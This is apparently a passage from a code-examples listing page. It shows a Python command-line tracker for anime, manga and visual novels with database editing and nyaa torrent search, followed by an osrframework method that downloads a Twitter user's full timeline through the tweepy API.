            cmdsplit = cmd.split(' ')
            args = ''
            for arg in cmdsplit[1:]:
                args += arg + ' '
            args = args[:-1].replace('\n', '')
        except (EOFError, KeyboardInterrupt):
            print(COLORS.green + 'Bye~' + COLORS.default)
            sys.exit(0)

        if cmdsplit[0].lower() in ['q', 'quit']:
            print(COLORS.green + 'Bye~' + COLORS.default)
            sys.exit(0)
        elif cmdsplit[0].lower() in ['set_ps1', 'sps1']:
            args += ' '

            CONFS['PS1'] = args
            with open(CONFPATH, 'wb') as conf_file:
                conf_file.write(json.dumps(CONFS))
                conf_file.close()
            PS1 = args
        elif cmdsplit[0].lower() in ['help', 'h']:
            print(COLORS.header + 'Commands' + COLORS.default)
            print('\thelp or h \t\t - prints this')
            print('\tquit or q \t\t - quits')
            print('\tset_ps1 or sps1 \t - changes PS1')
            print('\tswitchdb or sdb \t - changes working database when' +\
			'opened with multiple files')
            print('\tadd or a \t\t - adds an entry')
            print('\tlist or ls\t\t - lists all entries')
            print('\tdelete, del or d \t - deletes an entry with the given' +\
			'index')
            print('\tedit or e \t\t - edits an entry')
            print('\tinfo or i\t\t - shows information on an entry')
            print('\toinfo or o\t\t - shows online information on an entry' +\
			'(if given entry number) or name')
            print('\tpicture, pic, image, img - shows an image of the entry' +\
			'or name')
            print('\tnyaa or n\t\t - searches nyaa.eu for torrent of an' +\
			'entry (if given entry number) or name')
            print('\tsort or s\t\t - swaps or moves entries around')
            print('\tfilter, f or search\t - searches the database (by' +\
			'name/genre/obs/type/lastwatched)')
            print('')
        elif cmdsplit[0].lower() in ['switchdb', 'sdb']:
            try:
                currentdb += 1
                repr(dbs[currentdb])
            except IndexError:
                currentdb = 0
            print('Current database: ' + COLORS.header + dbs[
			currentdb].dictionary['name'] + COLORS.default + ' (' + dbs[
			currentdb].dictionary['description'] + ')')
        elif cmdsplit[0].lower() in ['l', 'ls', 'list']:
            if len(dbs[currentdb].dictionary['items']) == 0:
                print(COLORS.warning +\
				'No entries found! Use "add" for adding one' + COLORS.default)
                continue
            else:
                for entry in sorted(dbs[currentdb].dictionary['items'],
				key=lambda x: x['id']):
                    rcolors = {'d': COLORS.fail, 'c': COLORS.blue, 'w':
                     COLORS.green, 'h': COLORS.warning, 'q': COLORS.header}

                    if entry['status'].lower() in rcolors:
                        sys.stdout.write(rcolors[entry['status'].lower()])
                    if os.name != 'nt':
                        print('\t' + str(entry['id']) + ' - [' +\
						entry['status'].upper() + '] ' + entry['name'] +\
						COLORS.default)
                    else:
                        print('\t' + str(entry['id']) +\
						' - [' + entry['status'].upper() + '] ' +\
						entry['name'].encode('ascii', 'ignore') +\
						COLORS.default)
        elif cmdsplit[0].lower() in ['search', 'filter', 'f']:
            if len(cmdsplit) < 3:
                print('Usage: ' + cmdsplit[0] + ' <filter> <terms>')
                print('Where <filter> is' +\
				'name/genre/lastwatched/status/obs/type')
            else:
                if cmdsplit[1].lower() in ['name', 'genre', 'lastwatched',
				'status', 'obs', 'type']:
                    for entry in sorted(dbs[currentdb].dictionary['items'], \
					key=lambda x: x['id']):
                        if ' '.join(cmdsplit[2:]).lower() in \
						entry[cmdsplit[1].lower()].lower():
                            rcolors = {'d': COLORS.fail, 'c': COLORS.blue, 'w':
                                       COLORS.green, 'h': COLORS.warning, 'q':
									   COLORS.header}

                            if entry['status'].lower() in rcolors:
                                sys.stdout.write(
                                    rcolors[entry['status'].lower()])
                            if os.name != 'nt':
                                print('\t' + str(entry['id']) + ' - [' +\
								entry['status'].upper() + '] ' +\
								entry['name'] + COLORS.default)
                            else:
                                print('\t' + str(entry['id']) + ' - [' +\
								entry['status'].upper() + '] ' +\
								entry['name'].encode('ascii', 'ignore') +\
								COLORS.default)
                else:
                    print('Usage: ' + cmdsplit[0] + ' <filter> <terms>')
                    print('Where <filter> is name/genre/lastwatched/status/obs')
        elif cmdsplit[0].lower() in ['d', 'del', 'delete']:
            entry = pick_entry(args, dbs[currentdb])
            if entry == None:
                continue
            confirm = ''
            while (confirm in ['y', 'n']) == False:
                confirm = input(
                    COLORS.warning + 'Are you sure? [y/n] ' +\
					COLORS.default).lower()
            dbs[currentdb].dictionary['items'].remove(entry)
            dbs[currentdb].dictionary['count'] -= 1

            rebuild_ids(dbs[currentdb])

        elif cmdsplit[0].lower() in ['image', 'img', 'picture', 'pic', 'pix']:
            accepted = False
            if args.isdigit():
                if args >= 0 and len(dbs[currentdb].dictionary['items']) >=\
                int(args):
                    eid = dbs[currentdb].dictionary['items'][int(
                    args)]['aid']
                    etype = dbs[currentdb].dictionary[
                    'items'][int(args)]['type']
                    accepted = True
                else:
                    print(COLORS.fail + 'The entry ' + args +\
				    ' is not on the list' + COLORS.default)
            else:
                title = args

                entry_type = ''
                while (entry_type in ['anime', 'manga', 'vn']) == False:
                    entry_type = input(
                    COLORS.bold + '<Anime, Manga or VN> ' +\
                    COLORS.default).lower()

                if entry_type in ['anime', 'manga']:
                    search_results = ANN.search(title, entry_type)
                elif entry_type == 'vn':
                    search_results = VNDB.get(
                   'vn', 'basic', '(title~"' + title + '")', '')['items']
                if os.name == 'nt':
                    for result in search_results:
                        for key in result:
                            result[key] = result[key].encode('ascii',
                            'ignore')
                i = 0
                for result in search_results:
                    print(COLORS.bold + '[' + str(i) + '] ' +\
                    COLORS.default + result['title'])
                    i += 1
                print(COLORS.bold + '[A] ' + COLORS.default + 'Abort')
                while accepted == False:
                    which = input(
                    COLORS.bold + 'Choose> ' + COLORS.default
                    ).replace('\n', '')
                    if which.lower() == 'a':
                        break
                    if which.isdigit():
                        if int(which) <= len(search_results):
                            malanime = search_results[int(which)]
                            eid = malanime['id']
                            etype = entry_type
                            accepted = True
            if accepted:
                if etype in ['anime', 'manga']:
                    deep = ANN.details(eid, etype)
                elif etype == 'vn':
                    deep = VNDB.get(
                    'vn', 'basic,details', '(id=' + str(eid) + ')', '')\
                    ['items'][0]
                print(COLORS.header + 'Fetching image, please stand by...' +\
				COLORS.default)
                utils.showImage(
                deep[('image_url' if etype != 'vn' else 'image')])
        
        elif cmdsplit[0].lower() in ['s', 'sort']:
            if len(cmdsplit) != 4:
                print('Invalid number of arguments')
                print('Must be:')
                print('	(s)ort [(s)wap/(m)ove] [index] [index]')
                print('')
                print('When moving, first index should be "from entry" and' +\
				'second index should be "to entry"')
                continue

            if (cmdsplit[2].isdigit() == False) or\
			(cmdsplit[3].isdigit() == False):
                print(COLORS.fail + 'Indexes must be digits' + COLORS.default)
                continue

            if cmdsplit[1].lower() in ['swap', 's']:
                # Swap ids
                dbs[currentdb].dictionary['items'][
                    int(cmdsplit[2])]['id'] = int(cmdsplit[3])
                dbs[currentdb].dictionary['items'][
                    int(cmdsplit[3])]['id'] = int(cmdsplit[2])

                # Re-sort
                dbs[currentdb].dictionary['items'] = sorted(
                    dbs[currentdb].dictionary['items'], key=lambda x: x['id'])

                # Save
                dbs[currentdb].save()
            elif cmdsplit[1].lower() in ['move', 'm']:
                # Fool ids
                dbs[currentdb].dictionary['items'][int(cmdsplit[2])][
                    'id'] = float(str(int(cmdsplit[3]) - 1) + '.5')

                # Re-sort
                dbs[currentdb].dictionary['items'] = sorted(
                    dbs[currentdb].dictionary['items'], key=lambda x: x['id'])

                # Rebuild ids now that we have them in order
                rebuild_ids(dbs[currentdb])

            else:
                print(COLORS.warning + 'Usage: (s)ort [(s)wap/(m)ove]' +\
                '[index] [index]' + COLORS.default)
                continue

        elif cmdsplit[0].lower() in ['info', 'i']:
            entry = pick_entry(args, dbs[currentdb])
            if entry == None:
                continue

            if entry['type'].lower() in ['anime', 'manga']:
                if entry['type'].lower() == 'anime':
                    t_label = 'Last watched'
                else:
                    t_label = 'Last chapter/volume read'
                toprint = {'Name': entry['name'], 'Genre': entry['genre'],
                           'Observations': entry['obs'], t_label:
                           entry['lastwatched'], 'Status':
                           utils.translated_status[entry['type']][entry[
                           'status'].lower()]}
            elif entry['type'].lower() == 'vn':
                toprint = {'Name': entry['name'], 'Genre': entry['genre'],
                           'Observations': entry['obs'], 'Status':
                            utils.translated_status[entry['type']][entry[
                            'status'].lower()]}

            for k in toprint:
                if os.name != 'nt':
                    print(COLORS.bold + '<' + k + '>' + COLORS.default + ' ' +\
                    str(toprint[k]))
                else:
                    print(COLORS.bold + '<' + k + '>' + COLORS.default + ' ' +\
                    toprint[k].encode('ascii', 'ignore'))

        elif cmdsplit[0].lower() in ['edit', 'e']:
            # INTRO I
            entry = pick_entry(args, dbs[currentdb])
            if entry == None:
                continue

            # INTRO II
            if os.name != 'nt':
                n_name = input(
                    '<Name> [' + entry['name'].encode('utf8') + '] ').replace(
                    '\n', '')
            else:
                n_name = input(
                    '<Name> [' + entry['name'].encode('ascii', 'ignore') + '] '
                    ).replace('\n', '')

            if entry['type'].lower() != 'vn':
                n_genre = input(
                    '<Genre> [' + entry['genre'].decode('utf8') + '] '
                    ).replace('\n', '')
            else:
                n_genre = ''

            # ZIGZAGGING
            n_lw = None
            n_status = None
            if entry['type'] == 'anime':
                n_status = "placeholder"
                while (n_status in ['w', 'c', 'q', 'h', 'd', '']) == False:
                    n_status = input(
                        '<Status> [W/C/Q/H/D] [' + entry['status'].upper() +\
                        '] ').replace('\n', '').lower()
                n_lw = input(
                    '<Last episode watched> [' + entry['lastwatched'] +\
                    ']>'.replace('\n', ''))
            elif entry['type'] == 'manga':
                n_status = "placeholder"
                while (n_status in ['r', 'c', 'q', 'h', 'd', '']) == False:
                    n_status = input(
                        '<Status> [R/C/Q/H/D] [' + entry['status'].upper() +\
                        '] ').replace('\n', '').lower()
                if n_status == 'r':
                    n_status = 'w'
                n_lw = input(
                    '<Last page/chapter read> [' + entry['lastwatched'] +\
                    ']> ').replace('\n', '')
            elif entry['type'] == 'vn':
                n_status = "placeholder"
                while (n_status in ['p', 'c', 'q', 'h', 'd', '']) == False:
                    n_status = input(
                        '<Status> [P/C/Q/H/D] [' + entry['status'].upper() +\
                        '] ').replace('\n', '').lower()
                if n_status == 'p':
                    n_status = 'w'
                n_lw = ''

            # EXTENDED SINGLE NOTE
            n_obs = input('<Observations> [' + entry['obs'] + ']> ')

            # BEGIN THE SOLO
            if n_name == '':
                n_name = entry['name']
            dbs[currentdb].dictionary['items'][int(args)]['name'] =\
            utils.HTMLEntitiesToUnicode(utils.remove_html_tags(n_name))
            if n_genre == '' and entry['type'].lower() != 'vn':
                n_genre = entry['genre']
            if entry['type'].lower() != 'vn':
                dbs[currentdb].dictionary['items'][int(args)]['genre'] =\
                utils.HTMLEntitiesToUnicode(utils.remove_html_tags(n_genre))
            if n_status != None:
                if n_status == '':
                    n_status = entry['status']
                dbs[currentdb].dictionary['items'][
                    int(args)]['status'] = n_status
                if n_lw == '':
                    n_lw = entry['lastwatched']
                dbs[currentdb].dictionary['items'][
                    int(args)]['lastwatched'] = n_lw
            if n_obs == '':
                n_obs = entry['obs']
            dbs[currentdb].dictionary['items'][int(args)]['obs'] = n_obs

            # Peaceful end
            dbs[currentdb].save()
            print(COLORS.green + 'Done' + COLORS.default)
            continue
        elif cmdsplit[0].lower() in ['n', 'NYAA']:
            if args.isdigit():
                if args >= 0 and\
                len(dbs[currentdb].dictionary['items']) >= int(args):
                    term = dbs[currentdb].dictionary[
                        'items'][int(args)]['name']

                    if dbs[currentdb].dictionary['items'][int(args)]['type'\
                    ].lower() == 'anime':
                        if dbs[currentdb].dictionary['items'][int(args)][\
                        'status'].lower() == 'c':
                            if dbs[currentdb].dictionary['items'][int(args)][\
                            'lastwatched'].isdigit():
                                choice = ''
                                while (choice in ['y', 'n']) == False:
                                    choice = input(COLORS.bold +\
	                                'Do you want to search for the next' +\
                                     'episode (' + str(
                                        int(dbs[currentdb].dictionary['items'][
                                        int(args)]['lastwatched']) + 1) +\
                                        ')? [Y/n] ' + COLORS.default).lower()
                                    if choice.replace('\n', '') == '':
                                        choice = 'y'

                                if choice == 'y':
                                    new_lw = str(
                                        int(dbs[currentdb].dictionary['items'][
                                        int(args)]['lastwatched']) + 1)
                                    if len(str(new_lw)) == 1:
                                        new_lw = '0' + new_lw
                                    term = term + ' ' + new_lw

                else:
                    print(COLORS.fail + 'The entry ' + args +\
                    ' is not on the list' + COLORS.default)
                    continue
            else:
                term = args

            print(COLORS.header + 'Searching NYAA.eu for "' + term +\
            '"...' + COLORS.default)
            search_results = NYAA.search(term)
            print('')

            if len(search_results) == 0:
                print(COLORS.fail + 'No results found' + COLORS.default)
                continue

            i = 0
            for result in search_results[:15]:
                if os.name != 'nt':
                    print(COLORS.bold + '[' + str(i) + '] ' +\
                    COLORS.default + result['title'])
                else:
                    print(COLORS.bold + '[' + str(i) + '] ' + COLORS.default +\
                    result['title'].encode('ascii', 'ignore'))
                i += 1
            print('[C] Cancel')

            has_picked = False
            while has_picked == False:  # Ugly I know
                which = input(
                    COLORS.bold + 'Choose> ' + COLORS.default).replace('\n', '')
                if which.lower() == 'c':
                    break

                if which.isdigit():
                    if int(which) <= len(search_results) and int(which) <= 15:
                        picked = search_results[int(which)]
                        has_picked = True

            if has_picked:
                print('')
                if os.name == 'nt':
                    for key in picked:
                        picked[key] = picked[key].encode('ascii', 'ignore')
                print(COLORS.bold + '<Title> ' + COLORS.default +\
                picked['title'])
                print(COLORS.bold + '<Category> ' + COLORS.default +\
                picked['category'])
                print(COLORS.bold + '<Info> ' + COLORS.default +\
                picked['description'])
                print(COLORS.bold + '<URL> ' + COLORS.default + picked['url'])

                print('')
                choice = ''
                while (choice in ['t', 'd', 'n', 'r']) == False:
                    print(COLORS.bold + '[T] ' + COLORS.default +\
                    'Download .torrent file')
                    print(COLORS.bold + '[D] ' + COLORS.default +\
                    'Download all files (simple torrent client)')
                    print(COLORS.bold + '[R] ' + COLORS.default +\
                    'Load and start on rTorrent (xmlrpc)')
                    print(COLORS.bold + '[N] ' + COLORS.default +\
                    'Do nothing')
                    choice = input(
                        COLORS.bold + 'Choose> ' + COLORS.default).lower()

                if choice == 'r':
                    if os.name == 'nt':
                        print(COLORS.fail + 'Not available on Windows' +\
                        COLORS.default)
                        continue

                    try:
                        server = rtorrent_xmlrpc.SCGIServerProxy(
                            'scgi://localhost:5000/')
                        time.sleep(1)
                        server.load_start(picked['url'])
                        time.sleep(.5)
                        print(COLORS.green + 'Success' + COLORS.default)
                    except:
                        print(COLORS.fail + 'Error while connecting or adding'+\
                        'torrent to rTorrent' + COLORS.default)
                        print(COLORS.warning + 'ATTENTION: for this to work' +\
                        'you need to add the following line to ~/.rtorrent.rc:')
                        print('\tscgi_port = localhost:5000')
                        print('')
                        print('And rTorrent needs to be running' +\
                        COLORS.default)
                        continue
                elif choice == 't':
                    metadata = urlopen(picked['url']).read()

                    while True:
                        filepath = input(
                            COLORS.bold + 'Save to> ' +\
                            COLORS.default).replace('\n', '')
                        try:
                            metadata_file = open(filepath, 'wb')
                            metadata_file.write(metadata)
                            metadata_file.close()
                        except IOError as error:
                            print(COLORS.fail + 'Failed to save file' +\
                            COLORS.default)
                            print(COLORS.fail + 'Exception! ' + str(error) +\
                            COLORS.default)
                            print('Retrying...')
                            print('')
                            continue
                        break

                    print('Done')

                    if args.isdigit():
                        choice = ''
                        while not (choice in ['y', 'n']):
                            choice = input(
                                'Would you like me to increment the last' +\
                                'watched field? [Y/n] ').lower()

                        if choice == 'y':
                            if not dbs[currentdb].dictionary['items'][
                            int(args)]['lastwatched'].isdigit():
                                print(COLORS.error + 'The last watched field' +\
                                'on this entry is apparently not a digit,')
                                print('will not proceed.' + COLORS.default)
                            else:
                                dbs[currentdb].dictionary['items'][int(args)][
                                'lastwatched'] = str(
                                    int(dbs[currentdb].dictionary['items'][
                                    int(args)]['lastwatched']) + 1)
                                dbs[currentdb].save()

                if choice == 'd':
                    try:
                        import libtorrent as lt
                    except ImportError:
                        print(COLORS.fail +\
                        'libTorrent Python bindings not found!' +\
                        COLORS.default)
                        print('To install it check your distribution\'s' +\
                        ' package manager (python-libtorrent for Debian' +\
                        ' based ones) or compile libTorrent with the' +\
                        '--enable-python-binding')
                        continue

                    print(COLORS.header + 'Downloading to current folder...' +\
                    COLORS.default)

                    ses = lt.session()
                    ses.listen_on(6881, 6891)
                    decoded = lt.bdecode(urlopen(picked['url']).read())
                    info = lt.torrent_info(decoded)
                    torrent_handle = ses.add_torrent(info, "./")

                    while (not torrent_handle.is_seed()):
                        status = torrent_handle.status()

                        state_str = [
                            'queued', 'checking', 'downloading metadata',
                            'downloading', 'finished', 'seeding', 'allocating',
                            'checking resume data']
                        sys.stdout.write(
                            '\r\x1b[K%.2f%% complete (down: %.1f kb/s up:' +\
							'%.1f kB/s peers: %d) %s' %
                            (status.progress * 100, status.download_rate / 1000,
                             status.upload_rate / 1000,
                            status.num_peers, state_str[status.state]))
                        sys.stdout.flush()

                        time.sleep(1)
                    print('')
                    print('Done')

                    if args.isdigit():
                        choice = ''
                        while not (choice in ['y', 'n']):
                            choice = input(
                                'Would you like me to increment the last' +\
                                'watched field? [Y/n] ').lower()

                        if choice == 'y':
                            if not dbs[currentdb].dictionary['items'][int(
                            args)]['lastwatched'].isdigit():
                                print(COLORS.error + 'The last watched field' +\
                                'on this entry is apparently not a digit,')
                                print('will not proceed.' + COLORS.default)
                            else:
                                dbs[currentdb].dictionary['items'][int(args)][
                                'lastwatched'] = str(int(dbs[currentdb
                                ].dictionary['items'][int(args)][
                                'lastwatched']) + 1)
                                dbs[currentdb].save()

        elif cmdsplit[0].lower() in ['o', 'oinfo']:
            accepted = False
            if args.split(' ')[0].isdigit():
                if (int(args.split(' ')[0]) >= 0) and (len(dbs[currentdb].dictionary['items']) >= int(args.split(' ')[0])):
                    eid = dbs[currentdb].dictionary['items'][int(args.split(' ')[0])]['aid']
                    etype = dbs[currentdb].dictionary[
                        'items'][int(args.split(' ')[0])]['type']
                    accepted = True
                else:
                    print(COLORS.fail + 'The entry ' + args.split(' ')[0] +\
                    ' is not on the list' + COLORS.default)
            else:
                title = args

                entry_type = ''
                while (entry_type in ['anime', 'manga', 'vn']) == False:
                    entry_type = input(
                        COLORS.bold + '<Anime, Manga or VN> ' +\
                        COLORS.default).lower()

                if entry_type in ['anime', 'manga']:
                    search_results = ANN.search(title, entry_type, True)
                elif entry_type == 'vn':
                    search_results = VNDB.get(
                        'vn', 'basic', '(title~"' + title + '")', '')['items']
                if os.name == 'nt':
                    for result in search_results:
                        for key in result:
                            result[key] = result[key].encode('ascii', 'ignore')
                i = 0
                for result in search_results:
                    print(COLORS.bold + '[' + str(i) + '] ' + COLORS.default +\
                    result['title'])
                    i += 1
                print(COLORS.bold + '[A] ' + COLORS.default + 'Abort')
                while accepted == False:
                    which = input(
                        COLORS.bold + 'Choose> ' +\
                        COLORS.default).replace('\n', '')
                    if which.lower() == 'a':
                        break
                    if which.isdigit():
                        if int(which) <= len(search_results):
                            malanime = search_results[int(which)]

                            eid = malanime['id']
                            etype = entry_type
                            accepted = True

            if accepted:
                if etype in ['anime', 'manga']:
                    deep = ANN.details(eid, etype)
                elif etype == 'vn':
                    deep = VNDB.get(
                        'vn', 'basic,details', '(id=' + str(eid) + ')', '')[
                        'items'][0]

                if os.name == 'nt':
                    for key in deep:
                        deep[key] = deep[key].encode('ascii', 'ignore')

                if etype == 'anime':
                    alternative_title = (' (' + deep['other_titles'].get('japanese') + ')' \
                        if deep['other_titles'].get('japanese', '') != '' \
                        else '') if isinstance(deep['other_titles'].get('japanese', ''), str) \
                        else (' (' + '/'.join(deep['other_titles'].get('japanese', [])) + ')' if \
                        len(deep['other_titles'].get('japanese', [])) > 0 else '')
                    print(COLORS.bold + 'Title: ' + COLORS.default +\
                    deep['title'] + alternative_title)
                    if deep['end_date'] != None:
                        print(COLORS.bold + 'Year: ' + COLORS.default +\
                        deep['start_date'] + ' - ' + deep['end_date'])
                    else:
                        print(COLORS.bold + 'Year: ' + COLORS.default +\
                        deep['start_date'] + ' - ongoing')
                    print(COLORS.bold + 'Type: ' + COLORS.default + deep['type'])
                    if deep.get('classification', None) != None:
                        print(COLORS.bold + 'Classification: ' + COLORS.default +\
                        deep['classification'])
                    print(COLORS.bold + 'Episodes: ' + COLORS.default +\
                    str(deep['episodes']))
                    if deep.get('synopsis', None) != None:
                        print(COLORS.bold + 'Synopsis: ' + COLORS.default +\
                        utils.remove_html_tags(deep['synopsis']))
                    print(COLORS.bold + 'Picture available: ' + COLORS.default + \
                        ('yes' if deep['image_url'] != '' else 'no'))
                    print('')
                    if len(deep['OPsongs']) > 0:
                        print(COLORS.bold + 'Opening' + \
                            ('s' if len(deep['OPsongs']) > 1 else '') + \
                            ': ' + COLORS.default + deep['OPsongs'][0])
                        for song in deep['OPsongs'][1:]: 
                            print((' ' * 10) + song)

                    if len(deep['EDsongs']) > 0:
                        print(COLORS.bold + 'Ending' + \
                            ('s' if len(deep['EDsongs']) > 1 else '') + \
                            ': ' + COLORS.default + deep['EDsongs'][0])
                        for song in deep['EDsongs'][1:]:
                            print((' ' * 9) + song)
                    print('')
                    print(COLORS.bold + 'Studio' +\
                        ('s' if len(deep['credit']) > 1 else '') + ': ' + \
                        COLORS.default + (' / '.join(deep['credit'])))
                    print('')
                    print(COLORS.bold + 'Character list:' + COLORS.default)
                    for character in deep['characters']:
                        print('\t' + character + ' (voiced by ' + \
                            deep['characters'][character] + ')')
                    print('')
                    print(COLORS.bold + 'Episode list:' + COLORS.default)
                    for ep in sorted(deep['episode_names'], key=lambda x: int(x)):
                        print('\t #' + ep + ' ' + \
                            deep['episode_names'][ep])
                    print('')
                    print(COLORS.bold + 'Staff list:' + COLORS.default)
                    if '--full' in cmdsplit:
                        amount = len(deep['staff'])
                    else: amount = 7
                    i = 0
                    for staff in deep['staff']:
                        print('\t' + staff + ' (' + deep['staff'][staff] + ')')
                        i += 1
                        if i >= amount and len(deep['staff']) > amount:
                            print(COLORS.bold + '\tThere are ' + str(len(deep['staff']) - amount) + \
                             ' other staff members, use "' + COLORS.default + cmd + ' --full"' +\
                             COLORS.bold + ' to see more')
                            break

                elif etype == 'manga':
                    print(COLORS.bold + 'Title: ' + COLORS.default +\
                    deep['title'])
                    print(COLORS.bold + 'Chapters: ' + COLORS.default +\
                    str(deep['episodes']))
                    print(COLORS.bold + 'Synopsis: ' + COLORS.default +\
                    utils.HTMLEntitiesToUnicode(
                     utils.remove_html_tags(deep['synopsis'])))
                elif etype == 'vn':
                    if len(deep['aliases']) == 0:
                        print(COLORS.bold + 'Title: ' + COLORS.default +\
                        deep['title'])
                    else:
                        print(COLORS.bold + 'Title: ' + COLORS.default +\
                        deep['title'] + ' [' +\
                        deep['aliases'].replace('\n', '/') + ']')
                        platforms = []
                    for platform in deep['platforms']:
                        names = {
                            'lin': 'Linux', 'mac': 'Mac', 'win': 'Windows'}
                        if platform in names:
                            platform = names[platform]
                        else:
                            platform = platform[0].upper() + platform[1:]
                        platforms.append(platform)
                    print(COLORS.bold + 'Platforms: ' + COLORS.default +\
                    ('/'.join(platforms)))
                    print(COLORS.bold + 'Released: ' + COLORS.default +\
                    deep['released'])
                    print(COLORS.bold + 'Languages: ' + COLORS.default +\
                    ('/'.join(deep['languages'])))
                    print(COLORS.bold + 'Description: ' + COLORS.default +\
                    deep['description'])

                print('')

        elif cmdsplit[0].lower() in ['add', 'a']:
            online = False
            repeat = True
            title = ''
            entry_type = ''
            while repeat:
                repeat = False
                if title == '':
                    while title == '':
                        title = input(
                            COLORS.bold + '<Title> ' + COLORS.default).replace('\n', '')
                    entry_type = ''
                    while (entry_type in ['anime', 'manga', 'vn']) == False:
                        entry_type = input(
                            COLORS.bold + '<Anime, Manga or VN> ' +\
                            COLORS.default).lower()

                if entry_type in ['anime', 'manga']:
                    search_results = ANN.search(title, entry_type, online)
                elif entry_type == 'vn':
                    search_results = VNDB.get(
                        'vn', 'basic', '(title~"' + title + '")', '')['items']
                i = 0
                for result in search_results:
                    if os.name != 'nt':
                        print(COLORS.bold + '[' + str(i) + '] ' + COLORS.default +\
                        result['title'])
                    else:
                        print(COLORS.bold + '[' + str(i) + '] ' + COLORS.default +\
                        result['title'].encode('ascii', 'ignore'))
                    i += 1
                if len(search_results) == 0:
                    print('No results found, searching online..')
                    online = True
                    repeat = True
                    continue

                if not online:
                    print(COLORS.bold + '[O] ' + COLORS.default + 'Search online')
                print(COLORS.bold + '[C] ' + COLORS.default + 'Cancel')
                accepted = False
                while accepted == False:
                    which = input(
                        COLORS.bold + 'Choose> ' + COLORS.default).replace('\n', '')
                    if which.lower() == 'o':
                        online = True
                        repeat = True
                        accepted = True
                    elif which.lower() == 'c':
                    	print('')
                    	accepted = True
                    elif which.isdigit():
                        if int(which) <= len(search_results):
                            search_picked = search_results[int(which)]
                            if entry_type in ['anime', 'manga']:
                                deep = ANN.details(search_picked['id'], entry_type)
                            elif entry_type == 'vn':
                                deep = VNDB.get(
                                    'vn', 'basic,details', '(id=' +\
                                     str(search_picked['id']) + ')', '')['items'][0]
                            accepted = True

            if which.lower() == 'c': continue
            genre = ''
            if which == 'n':
                genre = input(
                    COLORS.bold + '<Genre> ' + COLORS.default).replace('\n', '')
            elif entry_type != 'vn':
                genres = ''
                for genre in deep['genres']:
                    genres = genres + genre + '/'
                genre = genres[:-1]

            if which != 'n':
                title = deep['title']

            status = ''
            while (status in ['c', 'w', 'h', 'q', 'd']) == False:
                status = input(COLORS.bold + '<Status> ' + COLORS.default +
                                   COLORS.header + '[C/W/H/Q/D] ' +\
                                   COLORS.default).lower()[0]

            if status != 'w' and entry_type != 'vn':
                last_ep = input(
                    COLORS.bold + '<Last episode watched> ' +\
                    COLORS.default).replace('\n', '')
            else:
                if entry_type == "anime":
                    last_ep = str(deep['episodes'])
                elif entry_type == "manga":
                    last_ep = str(deep['episodes'])
                else:
                    last_ep = ''

            obs = input(
                COLORS.bold + '<Observations> ' +\
                COLORS.default).replace('\n', '')

            try:
                dbs[currentdb].dictionary['count'] += 1
            except AttributeError:
                dbs[currentdb].dictionary['count'] = 1
            dbs[currentdb].dictionary['items'].append({'id': dbs[currentdb
             ].dictionary['count'], 'type': entry_type,
             'aid': search_picked['id'],
             'name': utils.HTMLEntitiesToUnicode(
              utils.remove_html_tags(title)), 'genre':
	          utils.HTMLEntitiesToUnicode(utils.remove_html_tags(genre)),
              'status': status, 'lastwatched': last_ep, 'obs': obs})
            rebuild_ids(dbs[currentdb])
            print(COLORS.green + 'Entry added' + COLORS.default + '\n')
        elif cmdsplit[0] == '':
            continue
        else:
            print(COLORS.warning + 'Command not recognized' + COLORS.default)
            continue

Example 29

Project: osrframework
Source File: twitter_api.py
View license
    def get_all_docs(self, screen_name):
        '''
            Method to get all the tweets emitted by a user.
            
            :param screen_name: The Twitter username.

            :return:    List of tweets.            
        '''
        def _getNewTweets(api, screen_name,count=200, oldest=None, waitTime=60):
            '''
                MEthod that recovers the new tweets or waits until the number of remaining calls has been freed.
                
                :param api:     A valid and connected api.
                :param screen_name: screen_name of the user to monitor.
                :param count:   Number of tweets to grab per iteration.
                :param oldes:  Oldest tweet to grab in this iteration.
                :param waitTime:    Number of seconds to wait between tries.
                                                                                
                :return:  List of new_tweets
            '''
            # Verifying the limits of the API
            #self._rate_limit_status(api=api, mode="get_all_docs")         
               
            waiting = True
            while waiting == True:
                try:
                    if oldest != None:
                        # We have to update the oldest id 
                        new_tweets = api.user_timeline(screen_name=screen_name, count=count, max_id=oldest)
                    else:
                        new_tweets = api.user_timeline(screen_name=screen_name, count=count)                        
                    waiting = False
                    #save most recent tweets

                except Exception as e:
                    # Error... We will have to wait
                    #waiting = True
                    print str(e)
                    #print(traceback.format_exc())                    
                    print "No more queries remaining, sleeping for " + str(waitTime) +" seconds..."
                    time.sleep(waitTime)          
                    
            return new_tweets
        
        # Connecting to the API
        api = self._connectToAPI()
    
        #initialize a list to hold all the tweepy Tweets
        alltweets = []    

        #make initial request for most recent tweets (200 is the maximum allowed count)
        """waiting = True
        while waiting == True:
            try:
                new_tweets = api.user_timeline(screen_name = screen_name,count=200)
                waiting = False
            except:
                # Error... We will have to wait
                waiting = True
                time.sleep(waitTime)  """         
        new_tweets = _getNewTweets(api, screen_name)
                
        alltweets.extend(new_tweets)
        # Storing manually all the json representation for the tweets        
        jTweets = []
        for n in new_tweets:
            jTweets.append(n._json)
        if len(alltweets) > 0:
            #save the id of the oldest tweet less one
            oldest = alltweets[-1].id - 1
        
            #keep grabbing tweets until there are no tweets left to grab
            while len(new_tweets) > 0:
                print "Getting tweets before %s" % (oldest)
            
                """ #all subsequent requests use the max_id param to prevent duplicates
                waiting = True
                while waiting == True:
                    try:
                        # We have to update the oldest id 
                        new_tweets = api.user_timeline(screen_name = screen_name,count=200, max_id=oldest)
                        waiting = False
                        #save most recent tweets

                    except:
                        # Error... We will have to wait
                        waiting = True
                        print "No more queries remaining, sleeping for " + str(waitTime) +" seconds..."
                        time.sleep(waitTime)  """

                new_tweets = _getNewTweets(api, screen_name, oldest=oldest)
                                 
                # Extending the list of tweets
                alltweets.extend(new_tweets)                                                                 
    
                #update the id of the oldest tweet less one
                oldest = alltweets[-1].id - 1        
                print "... %s tweets downloaded so far" % (len(alltweets))
                # Storing manually all the json representation for the tweets        
                for n in new_tweets:
                    jTweets.append(n._json)
        else:
            # Verifying the limits of the API
            print json.dumps(self._rate_limit_status(api=api, mode="get_all_docs"), indent =2)
            
        #transform the tweepy tweets into a 2D array that will populate the csv    
        outtweets = []      
        # This is how it is represented
        """
          "status": {
            "lang": "es", 
            "favorited": false, 
            "entities": {
              "symbols": [], 
              "user_mentions": [], 
              "hashtags": [], 
              "urls": []
            }, 
            "contributors": null, 
            "truncated": false, 
            "text": "Podemos confirmar que Alpify, aunque acabe en ...fy no es una aplicaci\u00f3n nuestra. ;) \u00a1A aprovechar lo que queda de domingo!", 
            "created_at": "Sun Aug 16 17:35:37 +0000 2015", 
            "retweeted": true, 
